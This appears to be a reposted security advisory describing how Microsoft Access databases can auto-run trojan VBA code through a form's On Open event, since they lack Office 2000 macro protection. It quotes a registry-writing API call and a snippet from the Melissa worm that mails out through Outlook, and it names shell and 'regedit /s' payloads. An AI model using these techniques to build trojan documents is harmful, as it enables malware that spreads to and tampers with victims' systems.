• Embed Doc
  • Copy Link
  • Readcast
  • Collections
  • CommentGo Back
 
Microsoft Access Trojan VBA code--[ Brief Summary:Microsoft Access Databases are not afforded "Macro execution protection" in themanner of Word/Excel/Powerpoint documents. Attackers can insert trojan VBA codeinto MS Access documents to execute arbitrary commands on the remote machine.--[ Foreground:There has been a great deal of discussion about MS Jet and ODBC not affordingappropriate protection to metacharacters, and the subsequent inbound hooks froman IIS server. (I'm terribly oversimplifying an excellent article byrfp@wiretrip.net et al: http://www.securityfocus.com/bid/286) However, trojanapplications have created a nasty media stir in the past. With Office 2000protection from macros, Access stands alone as unprotected. Hence this spin onthe trojan VBA issue.--[ Background:There has been (perhaps too much) publicity surrounding the trojan/viruscapabilities of Microsoft Office applications which enable macro executionoptions.The use of these trojans should subside now that Microsoft has implemented morestringent security options into the Office 2000 suite. Specifically, underTools|Macro|Security there are three security levels: High, Medium and Low (notrecommended). The "High security" setting is the default option for Word,Excel, and Powerpoint. This setting states that "Only signed macros fromtrusted sources will be allowed to run. Unsigned macros are automaticallydisabled." Bye, bye Melissa. Thhanx, MicroSoft.The Office 2000 suite uses Visual Basic for Applications (VBA) as it'sapplication-portable programming language. When a user records a macro inWord/Excel/Powerpoint, the actions are translated into VBA code. The subsequentVBA code sequence is then termed a macro, and afforded the protections of thesecurity settings listed above.--[ Issue:The Access application, however uses VBA as an integral part of formspresentation and processing which is in turn an integral part of a stand-aloneAccess application. You turn off VBA, Access is neither shiny nor happy.An attacker can craft an MS Access database with a single form which auto-launches. When the database is opened, the form is presented automagically.Within the properties of the form, the "On Open" property (default sub ofForm_Open) can contain VBA code.It looks like this:Double click DatabaseOpen DatabaseShow FormExecute VBA codeThe user simply opens the document, and the code is launched.
 
 --[ What can VBA do to me?Bad VBA code has been talked about in several threads. RFP mentions theVBA.Interaction.Shell command which executes a command on the local system.This is a quick and dirty payload, especially when coupled to the "regedit /s"command which would allow an attacker to create a .reg file, and import it intothe registry.A cleaner way becomes available, which is not available to the ODBC method. Theadvapi32.dll API Reg*Ex allows direct registry IO without taking the time toupload a .reg file. These functions can simply be defined along with thehideous necesary constants inside the VBA code.In addition, an attacker can follow in the footsteps of Melissa and use theVBA.Interaction.CreateObject call to create an MS Outlook instance which sendstrojan email to every address in the addressbook. *yawn*--[ ExamplesSimply click the attached Access application to see the effect this trojan canhave on your system. =) Seriously, these examples require quite a few constantdefinitions to work. If you're good enough to get all the constants figuredout, you're sharp enough to create these examples on your own. In short, Ididn't show you how to do it. ;)Our REG*EX method simply relies on a syntactically clean call to RegCreteKeyExto create a registry key:rc = RegCreateKeyEx(HKEY_CURRENT_USER, "johnny@ihackstuff.com", 0, "", _REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, secattr, Result, Disposition)This line will create a key under HKEY_CURRENT_USER called"johnny@ihackstuff.com". Groovy.The other calls, including RegSetValueEx and RegDeleteKey do various groovythings too.In honor of Kwyjibo, we can use the VBA.Interaction.CreateObject method tospread like wildfire thanks to MS Outlook:---Snip from Melissa---Set UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")If UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)BreakUmOffASlice.Recipients.Add "johnny@ihackstuff.com"BreakUmOffASlice.Subject = "Important Message From " &Application.CurrentUserBreakUmOffASlice.SendDasMapiName.Logoff---snip---Access doesn't implement the System library like MS Word does. Hence, theSystem.[doregistrystuff] calls won't work here. The system calls can bereplaced with just about any API you care to 'Define' in the VBA code. OtherVBA libraries such as the Application library shown above may prove as suitablereplacements.
of 00

Leave a Comment

You must be to leave a comment.
Submit
Characters: ...
You must be to leave a comment.
Submit
Characters: ...